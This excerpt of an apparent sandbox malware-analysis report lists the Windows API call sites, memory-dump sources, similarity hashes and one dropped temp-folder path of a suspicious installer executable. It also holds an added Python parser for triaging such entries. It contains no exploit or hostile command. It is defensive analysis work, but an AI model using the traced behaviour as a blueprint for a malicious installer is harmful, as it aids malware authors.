                                                                                                                                                                            • Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
                                                                                                                                                                            • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                                                                                                                                            • Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
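The per-function entries in this part of the report follow one fixed text layout (an "APIs" list of call sites, a "Memory Dump Source" block, the IDA plugin snapshot line, and a "Similarity" block of IDs and fuzzy hashes), which makes them easy to turn into structured data for triage or clustering across reports. The parser below is an added example and is not part of the Joe Sandbox report or of any Joe Security tooling; the sample text is copied from two of the entries above, and the choice of which header lines open a section and which lines to ignore is an assumption drawn from the layout as it appears here.

```python
"""Parse the function-level API entries of a Joe Sandbox report
("APIs" / "Memory Dump Source" / "Similarity" blocks) into records."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One call-site line, with or without an argument list, optionally
# prefixed by "Part of subcall function XXXXXXXX: ".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int                           # address of the call site
    subcall_of: Optional[int] = None   # callee address for "Part of subcall" lines


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)
    offset: Optional[int] = None       # image base recorded in the dump source


def _clean(line: str) -> str:
    """Strip indentation, the bullet glyph and the 'Download File' link text."""
    line = line.strip().lstrip("•").strip()
    if line.endswith("Download File"):
        line = line[: -len("Download File")].strip()
    return line


def parse_entries(text: str) -> list:
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line == "APIs":             # every function entry opens with this header
            cur = FunctionEntry()
            entries.append(cur)
            section = "APIs"
            continue
        if line in ("Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                        int(m["sub"], 16) if m["sub"] else None))
        elif section == "Memory Dump Source":
            m = re.search(r"Offset: ([0-9A-Fa-f]+)", line)
            if m and cur.offset is None:
                cur.offset = int(m.group(1), 16)
        elif section == "Similarity":   # "Key: value" pairs; value may be empty
            key, _, val = line.partition(":")
            cur.similarity[key.strip()] = val.strip()
    return entries


def direct_calls(entry: FunctionEntry) -> list:
    """API names the function calls itself (subcall lines excluded)."""
    return [c.name for c in entry.apis if c.subcall_of is None]


def find_callers(entries: list, api_name: str) -> list:
    """Call-site addresses at which api_name is invoked directly."""
    return [c.ref for e in entries for c in e.apis
            if c.name == api_name and c.subcall_of is None]


# Sample input copied from two entries of the report, indentation included.
SAMPLE = """
    APIs
    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
    • CloseHandle.KERNEL32(?), ref: 00405B20
    Memory Dump Source
    • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
    Similarity
    • API ID: CloseCreateHandleProcess
    • String ID:
    • API String ID: 3712363035-0
    APIs
    • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
    • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
      • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
      • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
      • Part of subcall function 00406864: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004068CA
    Similarity
    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
"""

ENTRIES = parse_entries(SAMPLE)

if __name__ == "__main__":
    for e in ENTRIES:
        print(e.similarity.get("API ID"), direct_calls(e), [hex(c.ref) for c in e.apis])
```

Run on a whole report's text, `find_callers` gives the call sites of any API of interest (for example `CreateProcessW`) with the subcall noise removed, and the `API ID` / fuzzy-hash fields in `similarity` can be compared across samples to spot functions shared between builds.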
                                                                                                                                                                            APIs
                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
APIs
• RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 004063CB
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,: Completed,?), ref: 00406398
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
APIs
• SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
                                                                                                                                                                            • Instruction ID: dab120aab1e819a0f3e7a590800bcc330433e48d8fa1e5c71f26214da8b737bd
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
                                                                                                                                                                            • Instruction Fuzzy Hash: B4D01272B08110DBDB11DBA8AA48B9D72A4AB50364B208537D111F61D0E6B9C5559619
APIs
• Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
• Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
• SetDlgItemTextW.USER32(?,?,00000000), ref: 0040447D
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: ItemTextlstrcatlstrlen
• String ID:
• API String ID: 281422827-0
• Opcode ID: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
• Instruction ID: a894ff31b73895be19cc099c8c24ae83fb845b4aca8af963ae3db1ea54c4578e
• Opcode Fuzzy Hash: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
• Instruction Fuzzy Hash: F6C08C31048200BFD281A704CC42F1FF3E8EF9031AF00C42EB15CE00D1C63494208A26
APIs
• SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
• Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
• Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
• Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C
APIs
• SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
• Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
• Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
• Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
• Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
• Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
• Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
APIs
• KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
  • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
  • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
  • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
  • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
  • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
  • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
  • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
  • Part of subcall function 00405AEA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
  • Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
  • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
  • Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32(?,?), ref: 004069B2
  • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
• String ID:
• API String ID: 2972824698-0
APIs
• GetDlgItem.USER32(?,000003FB), ref: 004049A3
• SetWindowTextW.USER32(00000000,?), ref: 004049CD
• SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
• CoTaskMemFree.OLE32(00000000), ref: 00404A89
• lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404ABB
• lstrcatW.KERNEL32(?,: Completed), ref: 00404AC7
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9
  • Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E
  • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
  • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
  • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
  • Part of subcall function 0040678E: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
• GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
  • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
  • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
  • Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner
• API String ID: 2624150263-3699076126
APIs
• CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
Strings
• C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner, xrefs: 00402269
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: CreateInstance
• String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner
• API String ID: 542301482-2682599531
APIs
• FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
• Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
• Opcode Fuzzy Hash: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
• Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404EE8
• GetDlgItem.USER32(?,00000408), ref: 00404EF3
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
• LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
• SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
• SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
• DeleteObject.GDI32(00000000), ref: 00404FCA
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
  • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
• SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
• GetWindowLongW.USER32(?,000000F0), ref: 0040510E
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
• ShowWindow.USER32(?,00000005), ref: 0040512C
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
• ImageList_Destroy.COMCTL32(?), ref: 004052FA
• GlobalFree.KERNEL32(?), ref: 0040530A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
• SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
• InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
• ShowWindow.USER32(?,00000000), ref: 004054B4
• GetDlgItem.USER32(?,000003FE), ref: 004054BF
• ShowWindow.USER32(00000000), ref: 004054C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 2564846305-813528018
• Opcode ID: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
• Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
• Opcode Fuzzy Hash: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
• Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
• GetDlgItem.USER32(?,000003E8), ref: 004046D4
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
• GetSysColor.USER32(?), ref: 00404702
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
• lstrlenW.KERNEL32(?), ref: 00404723
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
• GetDlgItem.USER32(?,0000040A), ref: 0040479E
• SendMessageW.USER32(00000000), ref: 004047A5
• GetDlgItem.USER32(?,000003E8), ref: 004047D0
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
• LoadCursorW.USER32(00000000,00007F02), ref: 00404821
• SetCursor.USER32(00000000), ref: 00404824
• LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
• SetCursor.USER32(00000000), ref: 00404840
• SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: : Completed$N
• API String ID: 3103080414-2140067464
• Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
• Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
• Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
• Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
• Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
• Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
• Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
• GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191
  • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
  • Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
• GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
• wsprintfA.USER32 ref: 004061CC
• GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
• SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
• GlobalFree.KERNEL32(00000000), ref: 004062B5
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC
  • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\fGu8xWoMrg.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
  • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %ls=%ls$[Rename]
• API String ID: 2171350718-461813615
• Opcode ID: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
• Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
• Opcode Fuzzy Hash: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
• Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004044E7
• GetSysColor.USER32(00000000), ref: 00404525
• SetTextColor.GDI32(?,00000000), ref: 00404531
• SetBkMode.GDI32(?,?), ref: 0040453D
• GetSysColor.USER32(?), ref: 00404550
• SetBkColor.GDI32(?,?), ref: 00404560
• DeleteObject.GDI32(?), ref: 0040457A
• CreateBrushIndirect.GDI32(?), ref: 00404584
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
• Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
• Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
• Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58
APIs
• ReadFile.KERNEL32(?,?,?,?), ref: 00402758
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
• SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
  • Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE
• SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
Strings
Memory Dump Source
• Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
• Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
• Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
• Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
APIs
